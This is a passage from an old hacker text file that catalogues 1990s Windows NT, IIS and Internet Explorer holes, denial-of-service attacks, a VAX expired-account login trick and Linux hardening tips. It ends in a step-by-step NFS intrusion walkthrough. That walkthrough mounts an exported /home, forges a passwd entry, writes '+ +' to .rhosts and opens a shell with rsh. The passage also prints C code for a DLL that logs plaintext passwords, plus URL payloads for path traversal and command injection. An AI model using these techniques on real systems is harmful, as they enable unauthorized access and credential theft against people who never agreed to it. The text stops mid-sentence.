10122the Internet with the FrontPage Server Extensions. However, FrontPage 97 automatically installs
10123a web server onto the workstation in order to store Web sites on the workstation for local
10124authoring and staging. Consequently each workstation with FrontPage 97 should be upgraded
10125with the new version of the FrontPage 97 Server Extensions for maximum security. If your
10126workstation does not have a full-time connection to the Internet and you connect occasionally
10127through a modem then the risk of exposure is low but still present, and Microsoft recommends
10128that you install the new Server Extensions.
10129
10130[13.2.2] IE and NTLM Authentication
10131--From ntsecurity.net
10132
10133A new problem discovered in MS Internet Explorer shows that NT transparently negotiates an
10134authentication attempt with a remote Web server any time that remote server requests an NTLM
10135authentication process. During that process, Internet Explorer will transmit your user name,
10136password, NT domain or workgroup name, and hostname.
10137Take note here that during this negotiation process, two versions of the user password are
10138transmitted. One is the full length password and the other represents the first 14 characters of the
10139password, transformed in to upper case letters. This fact alone is a GREAT argument for longer
10140passwords - longer that 14 chars that is.
10141IE clients cannot detect whether or not this negotiation process is taking place, which makes it
10142incredibly difficult to anticipate. Furthermore, IE can't determine what server it's talking to -- that is
10143to say, it doesn't know if the server is a valid system to negotiation with -- which means it could be
10144a rogue system. A server could preplan an attack by precomputing a giant database of potential
10145passwords, which can be used for comparison.
10146This is NOT an SMB issue, this is an NTLM issue.
10147EXAMPLE
10148The example is on the page where this was first announced. Please click here to jump to the
10149original page.
10150SOLUTION
10151You can protect yourself right now by stopping the NTLM SSP service, and disabling it. You may
10152do this using Control Panel | Services, but keep in mind this may adversely affect the operation of
10153the NT system - we take no responsibility.
10154Microsoft knows about this problem, and is looking in to it as of March 14, 1997. Watch this page
10155for more info.
10156
10157[13.2.3] Run Local Commands with IE
10158--From ntsecurity.net
10159
10160An icon can be embedded within a web page, which when double-clicked, may run a remote
10161application without warning. This is NOT the same bug as the ".LNK and .URL" problem
10162discovered recently.
10163According to the author, "this bug only effects Internet Explorer 3.0 users (version 4.70.1215).
10164The problem is significantly more serious if the user is on a platform with CIFS (Windows NT 4.0
10165with Service Pack 1 or later installed). If this is the case, the location of the malicious executable
10166code to be run on the victim's machine could be anywhere on the Internet. If this is not the case,
10167the location of the machine containing the code is restricted to within the scope of Windows name
10168resolution. For example, the host must be either on the same subnet, listed in the victim's
10169LMHOSTS file, or listed on the victim's WINS server."
10170Internet Explorer enables a user to utilize a URL describing a remote directory. When clicked, the
10171desktop moves to a Windows Explorer window -- but it's inside of Internet Explorer. If this URL is
10172used as the basis for an <IFRAME> tag, an embedded frame can be created with what is
10173essentially a Windows Explorer window inside. If this window is made small enough, it appears to
10174be some sort of button, which when clicked runs a remote program. CIFS allows a machine to
10175use the IP or hostname provided in the URL as a way of contacting the remote host containing
10176the executable.
10177
10178[13.2.4] IE can launch remote apps
10179--From ntsecurity.net
10180
10181Microsoft Internet Explorer v3.01 has a serious bug which allows web page writers to use ".LNK"
10182and ".URL" files to run programs on a remote computer. This bug is particularly damaging
10183because it uses NO ActiveX, and works even when Internet Explorer is set to its highest security
10184level. It was tested on Microsoft Internet Explorer Version 3.0 (4.70.1155) running Windows 95.
10185Microsoft says that users running Internet Explorer 3.0 and 3.01 for Windows 95 and Windows
10186NT are affected. It does not affect users of Internet Explorer 3.0 / 3.0a for Windows 3.1 or Internet
10187Explorer for Macintosh 2.1 / 3.0 / 3.0a.
10188.URLs work in both Windows 95 and Windows NT 4.0 -- .LNK's only work in Windows 95 -- .URL
10189files present a possibly greater danger because they can be easily created by server side scripts
10190to meet the specific settings of a user's system. We will provide .URL files for execution in the
10191next day or so on this page.
10192The "shortcuts" can be set to be minimized during execution which means that users may not
10193even be aware that a program has been started. Microsoft's implementation of shortcuts
10194becomes a serious concern if a webpage can tell Internet Explorer to refresh to an executable. Or
10195worse, client side scripts (Java, JavaScript, or VBScript) can use the Explorer object to transfer a
10196BATCH file to the target machine and then META REFRESH to that BATCH file to execute the
10197rogue command in that file.
10198The META REFRESH tag can be used to execute multiple commands in sequence. This demo
10199copies a .BAT file into your Internet Explorer cache and then runs the .BAT file. This .BAT will
10200create a new key in your registry called "HKEY_CURRENT_USER/Software/Cybersnot". It will
10201then open your AUTOEXEC.BAT and CONFIG.SYS in notepad. Finally, it will open REGEDIT so
10202that you can view the key it creates. According to its author, the demo below does not destroy
10203anything and should not cause any problems on your system. HOWEVER by downloading it, you
10204assume complete liablity for what it may do to your system.
10205
10206[13.2.5] Password Grabbing Trojans
10207From Jeremy Allison
10208
10209I am posting this to both the Samba list and the nt-security list as I believe this information will be
10210of interest to both groups. This message is somewhat long and contains code fragments so my
10211apologies if this is of no interest to you (just hit delete :-). Over several years helping to write
10212Samba and dealing with UNIX and NT integration problems one of the most common requests I
10213have seen is some way to get a UNIX box (maybe running Samba) to act as a NT domain
10214controller, or for some way to unify the password databases between UNIX boxes and NT
10215Domains. The first problem is not solveable due to the amount of Microsoft proprietary
10216information they would have to reveal, and MS are not willing to make that available. The second
10217problem however, is more tractable. It seems in NT4.x Microsoft have finally revealed enough
10218information to make synchronisation between UNIX and NT password databases possible.
10219Sync'ing from a UNIX box to an NT box was always possible, as the API's to change an NT
10220password have always been available in the old Lanman API set, the difficulty was sync'ing NT
10221password changes to a UNIX box, as the password change API's always seemed to go into a
10222'black box'to which no external access was available. It had to be possible, however, as NT
10223Domains are perfectly capable of synchronising with Netware LANs. As the password hash
10224mechanisms in NT and Netware are different the Netware password update mechanism had to
10225be able to get at the plaintext password at the update time, before it got hashed and placed in the
10226NT SAM. This mechanism is now available to other libraries on NT 4.x.
10227On NT 4.x there is a Key
10228HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
10229and one of the defined name/value pairs is "Notification Packages" which is a Multi_string value
10230which as shipped has a value of FPNWCLNT. This is obviously the name of a DLL (as I found it
10231as FPNWCLNT.DLL in %SYSTEMROOT%\SYSTEM32) and logic would dictate that this was the
10232place that the Netware password updates were done. The latest Microsoft SDK held the missing
10233part of the puzzle, the neccessary API's that need to be in such a DLL in order for it to get
10234password change notification. So here below, is a very simple DLL that will receive plaintext
10235password change notifications from the NT LSA code. The sample code just logs all password
10236change notifications to a file called C:\TEMP\PWDCHANGE.OUT, but it illustrates the technique.
10237To test it, comple the C code and .DEF file into a DLL called pwdchange.dll, copy it to
10238%SYSTEMROOT%\SYSTEM32 update the value
10239HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
10240to read
10241FPNWCLNT
10242PWDCHANGE
10243(NB. The newline between the two is *important*). and then reboot the machine. Tests show that
10244all password changes are now funnelled through this DLL with the following information,
10245Username, Plaintext password, RID (relative domain id). More interesting is that on creation of a
10246new user this DLL is also called, this could be used to do centralized account management by
10247creating a new UNIX user on the fly as a new NT user is created. Such a library would be
10248installed on the Primary domain controller for an NT domain, and will then allow all users
10249passwords to be propagated to non-NT systems as they are changed. The useful thing about this
10250method is that it gets called on *all* forms of password update, from using CTRL-ALT-DEL to
10251update your password, using USERMGR to change a password, or even by using the net user
10252<username> <password> command from the command prompt.
10253My own uses for this will be to keep an smbpasswd file up to date for the use by Samba, but a
10254proposed mechanism to keep a UNIX password database in synch would be as follows:
102551). Keep the notify DLL simple, as it is called in the context of an NT security system - we don't
10256want complexity here. Just write the change information down a named pipe from the DLL.
102572). Create a service, that creates the read end of the above named pipe. This service is
10258configured with the following information, held in the registry.
10259a). The name of the UNIX machine and TCP port number of a process on it to communicate with.
10260b). A 'secret' DES key (secret in quotes as anyone with Administrator access could read it) which
10261is used to encrypt the change notifications going across the net. This service would just read
10262password change notifications, encrypt the data and ship it to a UNIX machine where it could be
10263processed. This service can get as complex as we like, with queueing, retry, handshaking etc.
102643). Create a UNIX daemon, running as root, listening on the TCP port named above for password
10265change data. This daemon also needs access to the 'secret' DES key to decrypt the data
10266(probably in a root owned and read-only be root file).
10267This daemon could then be configured to keep whatever databases residing on the UNIX side in
10268sync are required. Suggestions are the UNIX password database, the Samba database, a
10269Kerberos password database, Oracle, Sybase.... be my guest :-).
10270If this above daemon is written so that new change notification modules can be plugged in to it
10271(like the PAM spec as an example) it would be flexible enough for all the above. Of course this
10272will make any securiy expert shudder, as compromising the DES key comprmises all new
10273password changes, but that's the price we pay for simplicity (Bruce Schneier(sp?) would
10274definately not approve :-). Anyway enough with the pontificating, here's the code :-). (Code was
10275written with Microsoft Visual C++ 4.x, not tested on other compilers). As always, this code has no
10276warranty, and using it may cause your system to self destruct in 5 seconds .. .etc, etc, etc....
10277(hope that's enough legal-ease to protect me :-)
10278Some comments by: Mark Joseph Edwards
10279Although some people think that this exploit only works on a PDC, this is NOT so. It works just
10280fine on NT systems installed just as a server (non-domain controller), and it also works just fine
10281on NT Workstation. This DOESN'T work on a Backup Domain Controller, but it DOES work on a
10282Primary Domain Controller. Also, take note that NT 4.0 and Service Pack 2 (or greater) are
10283required for this to work on any variety of NT installation. If you want more information on this
10284hook, see Microsoft's Knowledge Base article # Q151082, located here. You may also want to
10285take note right here and now that the MSGINA.DLL, which is the default "Graphical Identification
10286and Authorization" provider for the local console logon, could also be overwritten with a trojan
10287.DLL. Once this happens, you're toast. Ouch!
10288Here's Jeremy's useful (non-trojan) code:
10289-----------------cut here-------pwdchange.c-----------------------------
10290#include <windows.h>
10291#include <stdio.h>
10292#include <stdlib.h>
10293
10294struct UNI_STRING {
10295USHORT len;
10296USHORT maxlen;
10297WCHAR *buff;
10298};
10299
10300static HANDLE fh;
10301
10302BOOLEAN __stdcall InitializeChangeNotify ()
10303{
10304DWORD wrote;
10305fh = CreateFile("C:\\temp\\pwdchange.out",
10306GENERIC_WRITE,
10307FILE_SHARE_READ|FILE_SHARE_WRITE,
103080,
10309CREATE_ALWAYS,
10310FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
103110);
10312WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
10313return TRUE;
10314}
10315
10316LONG __stdcall PasswordChangeNotify (
10317struct UNI_STRING *user,
10318ULONG rid,
10319struct UNI_STRING *passwd
10320)
10321{
10322DWORD wrote;
10323WCHAR wbuf[200];
10324char buf[512];
10325char buf1[200];
10326DWORD len;
10327
10328memcpy(wbuf, user->buff, user->len);
10329len = user->len/sizeof(WCHAR);
10330wbuf[len] = 0;
10331wcstombs(buf1, wbuf, 199);
10332sprintf(buf, "User = %s : ", buf1);
10333WriteFile(fh, buf, strlen(buf), &wrote, 0);
10334
10335memcpy(wbuf, passwd->buff, passwd->len);
10336len = passwd->len/sizeof(WCHAR);
10337wbuf[len] = 0;
10338wcstombs(buf1, wbuf, 199);
10339sprintf(buf, "Password = %s : ", buf1);
10340WriteFile(fh, buf, strlen(buf), &wrote, 0);
10341
10342sprintf(buf, "RID = %x\n", rid);
10343WriteFile(fh, buf, strlen(buf), &wrote, 0);
10344
10345return 0L;
10346}
10347-----------------------end of pwdchange.c------------------------------------
10348---------cut here-pwdchange.def----------------------------------------------
10349EXPORTS
10350
10351InitializeChangeNotify=_InitializeChangeNotify@0
10352PasswordChangeNotify=_PasswordChangeNotify@12
10353
10354--------------------end pwdchange.def-----------------------------------------
10355
10356[13.2.6] Reverting an ISAPI Script
10357
10358ISAPI scripts run under the IUSR_MACHINENAME account under IIS, and thus, inherit the
10359security permissions of this account. However, if the ISAPI program contains a simple call
10360labelled RevertToSelf(), you have a big hole. Once that program line is executed, the ISAPI
10361program reverts it's authority to the all-powerful SYSTEM account, at which point the program
10362can do just about anything, including successfully execute system() calls.
10363Try it yourself - this DLL runs on Intel based IIS machines. Drop it in your scripts directory, and
10364call it without any parameters using your Web browser. (i.e.
10365http://www.yoursite.com/scripts/revert.dll) It creates a directory called C:\IIS-REVERT-TEST with
10366no trouble at all :( I tested this on an NTFS partition with no normal user permissions on the root
10367directory.
10368Additionally, Laxmikant Gunda was kind enough to report to us that there is yet another way to
10369perform this same exploit. Laxmikant offers the following:
10370"ISAPI DLL runs under the security context of the IUSR_MACHINENAME account under IIS, and
10371thus inherit the security permissions of that account. However, if the ISAPI DLL can create a
10372process using a call to CreateProcess( ). The process created inherits the security context of the
10373powerful LocalSystem account rather than IUSR_MACHINENAME, thus creating a hole. Thus,
10374any system process can be fired by the ISAPI DLL using this technique.
10375This can be tried using a generic ISAPI DLL & inserting code for CreateProcess( ) with a process
10376name present in the system.
10377This behaviour is documented in MSDN library on Impersonation : "When a thread is
10378impersonating a user, most actions by the thread are done in the security context of the thread's
10379impersonation token rather than the primary token of the process that owns the thread. For
10380example, an individual thread of a server process can impersonate a client to verify that the client
10381is allowed to access a securable object. However, some actions are always done using the
10382security context of the process. For example, if an impersonating thread calls the CreateProcess
10383function, the new process inherits the primary token of the process rather than the impersonation
10384token of the calling thread. Similarly, the system always uses the primary token of the process to
10385validate actions requiring the SE_TCB_NAME privilege."
10386
10387[13.2.7] Rollback.exe
10388
10389The Windows NT 4.0 Server and Workstation compact discs include a utility called Rollback.exe.
10390Rollback.exe was designed to help computer manufacturers preinstall Windows NT 4.0, and allow
10391end-users to do the final configuration according to the desired role of the computer. Running this
10392utility will remove all registry settings on a system and bring it back to the end of the Character
10393Based Setup portion of the Setup program, effectively undoing everything configured by the GUI
10394portion of Windows NT Setup.
10395WARNING: Do not run this file on a production system! There is no way to recover information
10396erased by running this utility, so anything stored in the registry will be lost. This includes user
10397account information, protocol bindings, application settings, user preferences, etc.
10398MORE INFORMATION
10399If you run Rollback.exe on a production system there is no warning that Rollback.exe removes all
10400system registry entries. Therfore, after you run Rollback.exe there is no system to rescue or to
10401restore as the registry and the Setup.log file no longer exist.
10402The only fix to this problem is to restore the entire system from a current tape back up.
10403Emergency Repair Disk does not restore the system as it requires the Setup.log and specific
10404registry components to be present.
10405Rollback.exe is on the Windows NT compact discs in the following directory:
10406support\deptools\<system>\
10407
10408[13.2.8] Replacing System .dll's
10409
10410System DLLs are called by applications and the registry, and can be replaced with
10411trojaned/virused versions. %systemroot% and %systemroot%\system32 directories have default
10412permissions of 'Everyone' (includes guest) set to 'Change'. This allows DLLs not in use to be
10413replaced. DLLs in use are locked.
10414DLLs are run by programs at various levels during normal operation. A DLL for example can be
10415run with SYSTEM privileges by a service while a user with normal privileges is logged on.
10416This is also true for the MSGINA.DLL, which is the default "Graphical Identification and
10417Authorization" provider for the local console logon, which if replaced, could seriously compromise
10418your entire enterprise.
10419
10420[13.2.9] Renaming Executables
10421
10422Executables renamed as .xxx files run as executable from command line. Executables can be
10423renamed with any extension and run from the command prompt or batch file. Subverts
10424filtering/download control by filename extension.
10425Also executables without a filename extension can be started from the command prompt or batch
10426file, as NT will try to run the file as .COM, .EXE, .CMD, or .BAT in that order.
10427This leaves room for a potential trojan to be introduced into the system.
10428
10429[13.3.0] Viewing ASP Scripts
10430
10431DESCRIPTION
10432A serious security hole was found in Microsoft's Active Server Pages (ASP) by Juan T. Llibre
10433<j.llibre@codetel.net.do>. This hole allows Web clients to download unprocessed ASP files
10434potentially exposing user ids and passwords. ASP files are the common file type used by
10435Microsoft's IIS and Active Server to perform server-side processing. Microsoft confirms that .HTX
10436and .IDC files are also vulnerable.
10437HOW IT WORKS
10438To download an unprocessed ASP file, simply append a period to the asp URL. For example:
10439http://www.domain1.com/default.asp becomes http://www.domain1.com/default.asp. With the
10440period appendage, Internet Information Server (IIS) will send the unprocessed ASP file to the
10441Web client, wherein the source to the file can be examined at will. If the source includes any
10442security parameter designed to allow access to other system processes, such as an SQL
10443database, they will be revealed.
10444
10445[13.3.1] .BAT and .CMD Attacks
10446
10447Sending a command line to the server, such as
10448"http://www.domain.com/scripts/expoit.bat?&commandA+?&commandB" to the server, and then
10449clicking the Stop Button on the browser will cause the server to execute DOS commands on the
10450server's OS.
10451Adding a '+?&time' or '+?&date' to the end of the command, will cause the server to pause for
10452input. Clicking the Stop Button on the browser will interrupt the server making a log entry of the
10453command string executed.
10454
10455[13.3.2] IIS /..\.. Problem
10456
10457A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of
10458the webserver content root directory. A URL such as
10459'http://www.domain.com/scripts..\..\scriptname' allows you to execute a target script.
10460By default user 'Guest' or 'IUSR_MACHINENAME' has read access to all files on an NT disk.
10461These files can be browsed, executed or downloaded by wandering guests.
10462
10463[13.3.3] Truncated Files
10464
10465A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file called
10466"target.bat". If the file "target.bat" already exists, the file will be truncated, erasing any previous
10467contents.
10468
10469[13.3.4] SNA Holes
10470--From ntsecurity.net
10471
10472When you attach to shared folders on an AS/400 using SNA Server, where the security level is
10473set to 30 or higher, and security has been set on the folders to allow limited access, after the first
10474user connects to a shared folder, all subsequent users acquire the first user's access permissions
10475to shared folders.
10476This problem occurs when SNA Server is sharing a single Local APPC LU when communicating
10477to an AS/400. The security for shared folders on the AS/400 (when security is set to level 30 or
10478higher), is tied to the controller. In this case, the AS/400 views the controller as its Remote LU, or
10479SNA Server's Local APPC LU.
10480The transaction program which supports the shared folders function on the AS/400 identifies a
10481user based on the SNA Server Local APPC LU name being used. Therefore, if multiple SNA
10482Server users are sharing the same Local APPC LU for use with shared folders, you are able to
10483view each other's AS/400 folders. Due to the design of the AS/400 shared folders feature, the first
10484shared folder's user to connect over a Local APPC LU determines the AS/400 security rights for
10485the remaining users who connect over the same Local APPC LU.
10486For Microsoft' information on this, see their Knowledge Base article:
10487http://www.microsoft.com/kb/articles/q138/0/01.htm
10488DEFENSE
10489Create a separate LU (Local to the SNA Server) for each user and pair each LU with the
10490AS/400's LU. Then each user accesses a separate controller and has appropriate access to
10491shared folders. In addition, each shared folder's client application must be configured with a
10492unique Local APPC LU alias. If you prefer to leave this field empty, the SNA Server administrator
10493can assign a default Local APPC LU alias for each user using SNA Admin (2.x) or SNA Server
10494Manager (3.x) configured on the user record.
10495
10496[13.3.5] SYN Flooding
10497
10498On your computer running the TCP/IP protocol and connected to the Internet, some or all network
10499services are rendered unavailable and error messages such as the following appear on the
10500network client screen:
10501The connection has been reset by the remote host.
10502This symptom of all network services being rendered unavailable may also occur on a computer
10503running an operating system other than Windows NT, for example, Unix.
10504Your computer has become the target of a malicious attack known as TCP/IP "SYN Flooding" or
10505"SYN Attacks."
10506"Computer hackers" can target an entire machine, or a specific TCP service such as web
10507services. The attack is focused on the TCP protocol used by all computers on the Internet, and is
10508not specific to the Windows NT operating system.
10509How SYN Flooding Works
10510SYN Flooding works as follows: (see also CERT(sm) Advisory CA-96.21 at
10511ftp://info.cert.org/pub/cert_advisories)
10512- A TCP connection request (SYN) is sent to the target computer. The source IP address in the
10513packet is "spoofed," or replaced with an address that is not in use on the Internet, or that belongs
10514to another computer. An attacker will send many of these TCP SYNs to tie up as many resources
10515as possible on the target computer.
10516- Upon receiving the connection request, the target computer allocates resources to handle and
10517track the new connection, then responds with a "SYN-ACK". In this case, the response is sent to
10518the "spoofed" non- existent IP address.
10519- No response is received to the SYN-ACK. A default-configured Windows NT 3.5x or 4.0
10520computer will retransmit the SYN-ACK 5 times, doubling the time-out value after each
10521retransmission. The initial time-out value is three seconds, so retries are attempted at 3, 6, 12,
1052224, and 48 seconds. After the last retransmission, 96 seconds are allowed to pass before the
10523computer gives up on receiving a response, and deallocates the resources that were set aside
10524earlier for the connection. The total elapsed time that resources are in use is 189 seconds.
10525If you suspect that your computer is the target of a SYN attack, you can type the following
10526command at a command prompt to view connections in the "SYN_RECEIVED" state:
10527netstat -n -p tcp
10528If a large number of connections are in the SYN_RECEIVED state, it is possible that the system
10529is under attack. A network analyzer can be used to track the problem down further, and it may be
10530necessary to contact your Internet Service Provider for assistance in attempting to trace the
10531source.
10532The effect of tying up connection resources varies, depending upon the TCP/IP stack and
10533applications listening on the TCP port. For most stacks, there is a limit on the number of
10534connections that can be in the half-open (SYN_RECEIVED) state. Once the limit is reached for a
10535given TCP port, the target computer responds with a reset to all further connection requests until
10536resources are freed.
10537
10538[13.3.6] Land Attack
10539
10540Land Attack sends SYN packets with the same source and destination IP addresses and the
10541same source and destination ports to a host computer. This makes it appear as if the host
10542computer sent the packet to itself. Windows NT operates more slowly while the host computer
10543tries to respond to itself.
10544
10545[13.3.7] Teardrop
10546
10547Two specially fragmented IP datagrams are sent to the victim. The first is the 0 offset fragment
10548with a payload of size N, with the MF bit on (data content is irrelevant). The second is the last
10549fragment (MF == 0) with a positive offset < N and with a payload of < N. The fragmented
10550datagrams will try to realign themselves, however, the payload of the current fragment does NOT
10551contain enough data to cover the realigning. This will cause a reboot or a halt, depending on how
10552much physical memory you've got.
10553
10554[13.3.8] Pentium Bug
10555
10556When an Intel processor receives a specific invalid instruction, your computer may stop
10557responding (hang). Your computer must be turned off and restarted to return to normal operation.
10558If you execute F0 0F C7 C8 on a P5 it will lock the machine up.
10559
10560[14.0.0] VAX/VMS Makes a comeback (expired user exploit)
10561
10562This is an explenation of a vax exploit that discover. The exploit
10563functions in that when a username has expired it doesnt delete the username
10564it just puts a new password on the username named temporary password. Until
10565the user can input a new password to reactivate his account. I will explain
10566this exploit step by step but this text is intended for a more advanced reader. Remember
10567VAX/VMS is a very secure area to work in you can get
10568caught if you dont know what you are doing. Well in this text i will give
10569you a server that has this exploit so you can verify it yourself.
10570Another thing is that you need to know about how to use the telnet program
10571if you dont know get a guide and start learning before using this.
10572
10573Step by Step explanation: (if you dont own an account on the VMS/VAX)
10574
10575[14.0.1] Step 1:
10576
10577 Finger the users of the server if you have a finger utility, but you need one that gives you
10578the last date login.
10579
10580[14.0.2] Step 2:
10581 Get the usernames that have an old date like a year ago, basically, something that looks
10582expired.
10583
10584[14.0.3] Step 3:
10585 Now goto to the login screen of the server type in the username.
10586When it promts you for a password you will type the word temp. Now for this
10587moment you will be entering the vax system and it will prompt you to type a
10588new pssword because the password has expired. As you can see you now owned
10589a user priviledge account.
10590
10591[14.0.4] Note:
10592
10593The easiest way to find systems that are exploitable is to check universities. As we know most
10594universities issue students usernames that are the first letter of their first name and then their
10595whole last name. Example: If your name is John Doe your username would be jdoe. So the best
10596thing you can do is finger universities and try to find as pointed out earlier user names that have
10597the last login date of a year or so ago.
10598
10599-Props to Hellmaster for the technique.
10600
10601[15.0.0] Linux security 101
10602
10603 So you just got the latest linux distro installed? What now? How about a bit of security.
10604You need to immediately secure your system after installation if you want your 0-day sploits to be
10605safe (especially if you hang out on irc). Here I will try and show ways to prevent remote and local
10606attacks. These techniques should work on redhat and debian, but it is primarily made for
10607slackware, the best distro out there.
10608
10609[15.0.1] Step 1: pico /etc/inetd.conf . This file tells inetd what daemons to open up each time it is
10610run. I generally only keep ftpd available to localhost and telnetd open to all. Close up any
10611services that you feel are not imperative to keep you running by sticking a # in front of the service
10612name.
10613
10614[15.0.2] Step 2: Permissions. Make sure that your root directory is only readable to root to
10615prevent users from snooping. Type: chmod 700 /root . Also, make sure that only the correct
10616owner can snoop through home directories. cd /home ; chmod 700 * . That should do it. Next,
10617chmod 700 /mnt ; chmod 700 /floppy ; chmod 700 /cdrom . Then you should have all the
10618permissions setup correctly.
10619
10620*Side note: You may want to only use X-windows as root (thats what I do), as X-win binarys are a
10621good way to exploit a system. So maybe do a chmod 700 /usr/X11/bin ; chmod 700
10622/usr/X11R6/bin .
10623
10624[15.0.3] Step 3: RPC services. Try typing rpcinfo -p localhost and see what you get. Remember
10625the results and go into /etc/rc.d . Look through those files for the various rpc servers. Comment
10626the rpc services as needed in those files. Almost every remote procedure call is exploitable. Its
10627better just not to run em.
10628
10629[15.0.4] Step 4: Install ttysnoop. ttysnoop allows you to see what users are doing when they login
10630to your box. Heres how to install:
10631
10632Type pico /etc/inetd.conf and stick a comment (#) in front of the line that reads:
10633
10634 telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
10635
10636Then look 3 lines below. You will see:
10637
10638#telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetsnoopd
10639
10640Uncomment that line, and save the file. Then restart inetd by typeing:
10641ps -aux |grep inetd
10642(get the pid #)
10643kill -9 (pid #)
10644inetd
10645
10646Then it should be restarted and you can try it out by telneting to localhost and logging in , and
10647then in another window type w to find out what tty you just logged into and then type: ttysnoop
10648ttyp# . You should now be able to see everything that the user types in. Very effective.
10649
10650[15.0.5] Step 5: Watching them. You should always be aware of who is on your system at any
10651given time. A good way to do this is to, if you are in X-windows, type xconsole -font 5x8 -file
10652/var/log/messages -geometry 550x80 . This will open a small xconsole window that will tel you
10653who is connecting to you. Keep this in a bottom corner. The next step is to get tcpdump. Find it
10654at sunsite. type tcpdump in a smaill xterm and keep that in another corner. What that will do is
10655show you every single little connection to you. Such as connections from every port.
10656
10657[15.0.6] Step 6: Misc security programs.
10658
10659 -SSH : Secure shell- This program is a replacement to telnet, so
10660 that your passwords cannot be sniffed. It uses encryption
10661 to connect to every server that you telnet to. More and
10662 more servers are using this everday because of the growing
10663 threat of hackers. Of course, the remote server that you
10664 are telneting to has to run SSH as well for it to work =)
10665
10666 -Lightbar : Login Security- This program is basically a
10667 replacement to /bin/login. It is EXTREMELY
10668 customizable and provides that extra edge of security
10669 to your login sequence.
10670
10671 -COPS : Computer Oracle and Password System- This nice little
10672 program automatically scans your system for
10673 misconfigurations and warns you of the weaknesses. Its an
10674 an excellent way to systematically check for file
10675 permission mistakes.
10676
10677By following the above steps, you have stopped about 99.8% of all hackers breaking into your
10678system (Just hope you dont meet up with some russian hacker =) You will be invincible on IRC.
10679Considering in all my time with Linux, Ive never been hacked. Peace out.
10680
10681 -Phreak-0 (Phreak_0@hotmail.com)
10682
10683Thanks to Phreak-0 for that portion.
10684
10685[16.0.0] Unix Techniques. New and Old.
10686
10687[16.0.1] ShowMount Technique
10688
10689This is an old school technique that most hackers don’t know. The two commands you need to
10690learn are showmount and mount.
10691
10692They are used in the following way:
10693
10694Intercore:~#mount server.com:/remotefolder /localfolder
10695After you issue the command then do cd /localfolder and you will be on the remote computers
10696shared folder. The remotefolder is the folder of the remote system that you want to mount. The
10697localfolder is where you want the remote folder to appear to be on your system. So if you do
10698mount server:/remote /mnt then when you are on your local system you can do cd /mnt and
10699browse around inside that folder. The contents of that folder will be the contents of the remote
10700folder that you shared.
10701
10702[16.0.2] DEFINITIONS:
10703showmount lists all the clients that have remotely mounted a filesystem from host. This
10704information is maintained by the mountd server on host, and is saved across crashes in the file
10705/etc/rmtab.
10706-e Print the list of shared file systems.
10707
10708mount attaches a file system to the file system hierarchy at the mount_point, which is the
10709pathname of a directory. If mount_point has any contents prior to the mount operation, these
10710are hidden until the file system is unmounted.
10711
10712umount unmounts a currently mounted file system, which may be specified either as a
10713mount_point or as special, the device on which the file system resides.
10714
10715rhosts The files specify remote hosts and users that are considered trusted. Trusted users are
10716allowed to access the local system without supplying a password. The remote authentication
10717procedure determines whether a user from a remote host should be allowed to access the
10718local system with the identity of a local user. This procedure first checks the /etc/hosts.equiv
10719file and then checks the .rhosts file in the home directory of the local user who is requesting
10720access. Entries in these files can be of two forms. Positive entries allow access, while negative
10721entries deny access. The authentication succeeds when
10722a matching positive entry is found.
10723hostname [username]
10724The special character `+' can be used in place of either hostname or username to match any
10725host or user. For example, the entry
10726+ +
10727gives any user at any host access to the shell without supplying a password.
10728
10729rpcinfo makes an RPC call to an RPC server and reports what it finds. In the first synopsis,
10730rpcinfo lists all the registered RPC services with rpcbind on host.
10731rpcinfo -p [host]
10732
10733A showmount on ninja.com would look like this:
10734InterCore:/home/chameleon/ $/usr/sbin/showmount -e www.ninja.com
10735export list for www.ninja.com:
10736/home Everyone
10737/usr elite.ninja.com
10738/var samuri.ninja.com
10739InterCore:/home/chameleon/ $
10740
10741The first section is the folder name. The section part is who has access. If it says Everyone then
10742anyone at all can access that folder. If it has an address like elite.ninja.com only people from
10743elite.ninja.com can access that folder. If there is a users folder shared or a home folder etc… that
10744is shared to everyone then you can gain a user account to the system. You would do the
10745following. Say we use ninja.com as an example. We earlier saw that we have access to /home we
10746would then mount /home and goto a users directory and create us an rlogin for the system. The
10747attack would be as follows.
10748
10749InterCore:/home/chameleon$ /usr/sbin/showmount -e www.ninja.com
10750export list for www.ninja.com:
10751/home Everyone
10752/usr elite.ninja.com
10753/var samuri.ninja.com
10754
10755Now, you must su to root to have access to mount things to various folders on the system.
10756
10757InterCore:/home/chameleon/ $su
10758Password:
10759InterCore:/home/chameleon#
10760InterCore:/home/chameleon# mount www.ninja.com:/home /mnt
10761InterCore:# cd /mnt
10762InterCore:/mnt/ # ls
10763jmwaller paget pamcourt papabear parsetru pathenry patsyk paulavic
10764pa1230 paintere pamdon papas partsman patio patti778 pauld
10765pac paintroc pamelaj pappabea pataiki patj pattic pauline
10766packers paiyn pamelat papryor pataul patjohn pattie paulj
10767paddock pal pamh paris1 patbrady patmon pattil paull1
10768padgettr paladin pamomary parkerh patc patmraz pattygae paulpj
10769
10770What you are looking at here is the contents of www.ninja.com's home dir.
10771Now lets add one of their users to our passfile, so we can become them.
10772
10773InterCore:# pico /etc/passwd
10774
10775add the lines:
10776
10777pamcourt::200:10023:Pam Court:/home/chameleon/mnt/pamcourt/:/bin/bash
10778 ^---we put this as the home dir, because this is where
10779the mounted home directory is located.
10780now, login locally as pamcourt
10781
10782InterCore:/mnt/home/pamcourt/$ whoami
10783pamcourt
10784InterCore:/mnt/home/pamcourt/$ echo "+ +" > ~/.rhosts
10785
10786This will make the rhosts entry as ++, which means anyone can remotely issue commands from
10787it. Now, we remotely login to ninja.com as pamcourt
10788
10789InterCore:/mnt/home/pamcourt/$rsh -l pamcourt www.ninja.com csh -i
10790Welcome to ninja.com
10791We are lame and left open a filesharing backdoor.
10792You therefore have a shell on ninja.com. The rsh and rlogin syntax is as follows:
10793rsh [ -l login ] [ -n ] host command
10794rlogin [ -E | -ex ] [ -l username ] [ -8 ] [ -L ] host
10795
10796That is how to gain a user account onto a remote system. Also if you can spoof your dns or
10797maybe the server has a router on it etc… that you can bounce through you could therefore
